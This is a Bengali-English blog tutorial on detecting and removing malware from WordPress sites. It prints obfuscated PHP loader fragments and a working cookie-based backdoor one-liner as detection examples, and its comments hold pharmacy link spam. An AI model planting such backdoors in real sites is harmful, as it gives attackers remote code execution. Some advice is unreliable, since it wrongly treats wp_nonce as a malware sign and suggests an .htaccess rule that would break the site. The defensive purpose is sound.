ওয়েবসাইট ম্যালওয়্যার কি? কিভাবে ওয়েবসাইটের ম্যালওয়ার ডিটেকশন এন্ড রিমুভাল করা যায়?

ওয়েবসাইট ম্যালওয়্যার কি? কিভাবে ওয়েবসাইটের ম্যালওয়ার ডিটেকশন এন্ড রিমুভাল করা যায়?

ওয়েবসাইট ম্যালওয়্যার কি?

 

ওয়েবসাইট ম্যালওয়্যার হল একটি সফ্টওয়্যার অথবা ম্যালিশিয়াস স্ক্রিপ্ট যা একটি ওয়েবসাইট বা ওয়েব সার্ভারে কাজ করার জন্য খারাপ উদ্দেশ্য নিয়ে তৈরি করা হয়েছে।

এই ধরনের ম্যালিশিয়াস স্ট্রিপ সাধারণত ওয়েবসাইটের back-end থেকে ইউজার তৈরি করতে পারে, ডেটাবেজ এবং যেকোন ফাইলের এক্সপ্রেস নিতে পারে, বারবার ম্যালিশিয়াস স্ক্রিপ্ট রিজেনারেট করে ওয়েবসাইটের ব্যান্ডউইথ নষ্ট করতে পারে। অথবা সার্ভার ডাউন করে দিতে পারে। অনেক সময় ওয়েবসাইটের এক্সিস্টিং ফাইল গুলো নষ্ট করে দিতে পারে এবং ওয়েবসাইট এ Defacement করতে পারে।

 

ম্যালওয়ার অ্যাটাক হলে ওয়েবসাইটের কি কি ক্ষতি হয়?

 

● ওয়েবসাইটের চেহারা পরিবর্তন হয়ে যেতে পারে(Defacement)

বিভিন্ন ওয়েবসাইট হ্যাক হওয়ার পর দেখা যায় hacked by অমুক। অথবা ফানি পিকচার হোমপেজে দেখা যায়। অর্থাৎ হ্যাকাররা ওয়েবসাইটটি Defacement করে থাকে।


● হ্যাক হওয়া ওয়েবসাইটে ম্যালিশিয়াস স্ক্রিপ্ট এর মাধ্যমে আমার ওয়েবসাইটের ট্রাফিককে অন্যান্য ওয়েবসাইটে রিডাইরেক্ট করতে পারে।


 ব্যাকডোর এর মাধ্যমে আমার অজান্তেই ওয়েবসাইটে লগইন করার জন্য ইউজার তৈরি হতে পারে, আমরা অনেক সময় দেখি ওয়েবসাইটে ডেটাবেজে অনেক আনইউজুয়াল ইউজার অ্যাকাউন্ট থাকে যা সাধারণত ব্যাকডোর এর মাধ্যমে তৈরি করা হয়। হ্যাকাররা এই ইউজার অ্যাকাউন্ট ব্যবহার করে আমাদের ওয়েবসাইটের এক্সেস পেয়ে যায়, ওয়েবসাইটের ফাইল Tampering, ফাইল ডিলিট থেকে শুরু করে পুরা ওয়েবসাইট রিমুভ পর্যন্ত করে দিতে পারে।

 

● ওয়েবসাইটে স্পার্ম কনটেন্ট রাখার মাধ্যমে SEO Spamming সহ কমেন্ট এর মাধ্যমে ব্যাকলিংক স্পামিং হতে পারে। এতে আমাদের ওয়েবসাইট ট্রাফিক নষ্ট হতে পারে। সার্ভার স্লো হয়ে যেতে পারে।

 

● অনেক ম্যালিশিয়াস স্ক্রিপ্ট এর মাধ্যমে ওয়েবসাইটের ব্যান্ডউইথ খুব দ্রুত শেষ হতে থাকে। এবং একটা সময় ওয়েবসাইটটি ডেটাবেজ থেকে ডিসকানেকটেড হয়ে ওয়েবসাইট ডাউন হয়ে যেতে পারে।

 

 

ওয়েবসাইটের ম্যালওয়ার ডিটেকশন (WordPress):

 

● eval()

This attack consists of a script that does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement, which results in code execution.

 

malware

eval malware

 

● <?php ${

 

malware

 

● base64_decode

Base64 is a simple malware obfuscation technique. The very reason why Base64 encoding is used is because using Base64 it is possible to encode binary data to ASCII string format. Thus, attackers encode data in base64 format and send it over HTTP Protocol. Base64 allows only 64 characters for encoding, hence the name. The characters are –

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=

“=” is used for padding.

 

base64_decode

 

● wp_nonce. (it is used to push remote user id and password – CSRF Attack)

 

wp_nonce malware

wp nonce

 

● gzdecode_render

 

gzdecode_render

 

● lzw_decompress

 

zw_decompress

 

● file_upload

 

file upload malware

 

● str_replace

This piece of code tries to obfuscate all the functions that could be flagged by a scanner using a benign php function called str_replace. This function replaces all instances of a string with a replacement in the subject.

str_replace malware

 

● strrev

Using the strrev function on variable allowed the attacker to reverse the string strrev(‘edo’.’c’.’ed_4′.’6e’.’sab’) into base64_decode

strrev malware

 

● Random string pattern

With random string pattern can always generate random strings and command’s also:

Random string pattern malware

 

● <?php $OO0__00_OO=urldecode

(PHP Re-Infectors – Example of an infected index.php file that automatically re-generates itself through a malicious process running in the background)

<?php $OO0__00_OO=urldecode malware

 

● <?php $ca2a = @$GLOBALS[$GLOBALS[‘k94124e4’][48]

 

<?php $ca2a = @$GLOBALS[$GLOBALS['k94124e4'][48]

malware

 

● <?php $Icc1ll1l1c=’772′; $I1lcl1cl1c=urldecode. – website redirect

 

<?php $Icc1ll1l1c='772'; $I1lcl1cl1c=urldecode

 

● <?php isset(${“\x5f\x47\x45\x54”}[“\x75\x72\x6c\x65\x72\x72”]. – website redirect/ backdoor

 

backdoor code

 

● <?php if(isset(COOKIE(“id”)))@$_COOKIE[“user”]($_COOKIE[“id”]); It creates remote users/backdoor

 

<?php if(isset(COOKIE("id")))@$_COOKIE["user"]($_COOKIE["id"]);

 

● if (!defined(“FFCBCD”)){define(“FFCBCD”, __FILE__);global
$<81>,$<99><93>

 

"● if (!defined(""FFCBCD"")){define(""FFCBCD"", __FILE__);global $<81>,$<99><93>"

 

● <?php
$vNWZ3B7 = Array(‘1’=>’6’, ‘0’=>’e’, ‘3’=>’8′, ‘2’=>’L’, ‘5’=>’v’, ‘4’=>’M’, ‘7’=>’2′, ‘6’=>’s’, ‘9’=>’r’, ‘8’=>’q’, ‘A’=>’l’, ‘C’=>’Y’, ‘B’=>’S’, ‘E’=>’K’, ‘D’=>’n’, ‘G’=>’T’, ‘F’=>’C’, ‘I’=>’y’, ‘H’=>’t’, ‘K’=>’G’, ‘J’=>’9’, ‘M’=>’k’, ‘L’=>’w’, ‘O’=>’H’, ‘N’=>’x’, ‘Q’=>’m’, ‘P’=>’E’, ‘S’=>’j’, ‘R’=>’O’, ‘U’=>’7’, ‘T’=>’4’, ‘W’=>’X’, ‘V’=>’D’, ‘Y’=>’d’, ‘X’=>’Z’, ‘Z’=>’I’, ‘a’=>’z’, ‘c’=>’R’, ‘b’=>’0’, ‘e’=>’B’, ‘d’=>’N’, ‘g’=>’h’, ‘f’=>’P’, ‘i’=>’o’, ‘h’=>’W’, ‘k’=>’c’, ‘j’=>’3’, ‘m’=>’A’, ‘l’=>’a’, ‘o’=>’f’, ‘n’=>’p’, ‘q’=>’F’, ‘p’=>’b’, ‘s’=>’5’, ‘r’=>’g’, ‘u’=>’J’, ‘t’=>’u’, ‘w’=>’U’, ‘v’=>’V’, ‘y’=>’Q’, ‘x’=>’1’, ‘z’=>’i’);
function v5T7ETO($vQF6A3S, $vP8XOME){$v8YITRE = ”; for($i=0; $i < strlen($vQF6A3S); $i++){$v8YITRE .= isset($vP8XOME[$vQF6A3S[$i]]) ? $vP8XOME[$vQF6A3S[$i]] : $vQF6A3S[$i];}
return base64_decode($v8YITRE);}
$vC3WWUF = ‘FQAQEKAak7vbEFcowPJGvq6zC7JMXBuYEBmQuzenkjdAYFrMWxefwxc’.
‘pZQdxkjc5pvJgCjcnp7TzWBMruzCrlWdoX7J5XqJnkFrMWxdqwAXqw’.

for sending spam, DoS

malware wordpress

 

ওয়েবসাইটের ম্যালওয়ার রিমুভাল:

 

Before Malware Removal Process:

● First take a backup manual and also with a backup plugin
● Must take a backup of htaccess,wp-config.php, wp-content and
database at list for WP website

 

Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

● wtf.php
● wphap.php
● php5.php
● data.php
● 1.php
● p.php

● The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules.

pharma spam code

●  in a theme’s index.php file, embedded in legitimate code:

index.php malware

● Prevension : in root .htaccess file add the codes:


<Files *.php>
Deny from All
</Files>

 

●  How is it cleaned?


Once you have found a backdoor. malware, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. You can try doing some basic searches for eval and base64_decode or other functions that we have mentioned. or you can use FTP to find and remove malwares.

 

● Following files are common places where you’ll find link injections:

 

● wp_blog_header.php (core file)
● index.php (core file)
● index.php (theme file)
● function.php (theme file)
● header.php (theme file)
● footer.php (theme file)

 

● SEO Spam Injection

Remove the codes manually.

seo spam injection

 

● SEARCH THE UPLOADS DIRECTORY FOR ANY .PHP FILES:


There is absolutely no reason for a .php file to be living in your uploads directory. Delete any you find.

find php file

 

● DELETE ANY INACTIVE THEMES


Backdoors may have been installed in your unused themes so delete those, including the wordpress ‘default’ and ‘classic’ themes.

inactive theme

● SCAN YOUR WORDPRESS WEBSITE FOR EXPLOITS AND SPAM


https://sitecheck.sucuri.net/
https://securityheaders.com/


sucuri site check

 

● ERASE AND RE-CREATE YOUR .HTACCESS FILE!


# BEGIN WordPress

RewriteEngine On
RewriteRule .* – [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

 

 

● Database Malware Scan And Removal Process:


● Go to phpmyadmin
● check wp-user table to see unusual users adding
● Copy the malicious script and search on database
● For redirect solving issue, Check wp-options table and recheck Homeurl & siteurl

phpmy admin

 

To read more ethical hacking blogs click here.

Thanks
Minhazul Asif

8 Responses

  1. Awesome forum posts. With thanks.
    canadian drug pharmacy viagra [url=https://canadianonlinepharmacybase.com/]canadadrugpharmacy com[/url] legitimate online pharmacy uk

  2. With thanks! I like it!
    revive rx pharmacy [url=https://canadianpharmacyonlinedb.com/]what is the best canadian online pharmacy[/url] domperidone from canadian pharmacy

  3. You actually reported it very well.
    online pharmacy india xanax [url=https://canadianpharmaceuticalsonlineus.com/]good canadian pharmacies[/url] mail order drugs from canada

  4. Terrific facts. Thanks a lot.
    precision rx specialty pharmacy [url=https://northwestpharmacylabs.com/]how to apply at cvs pharmacy online[/url] online mail order canadian pharmacies

Leave a Reply

Your email address will not be published. Required fields are marked *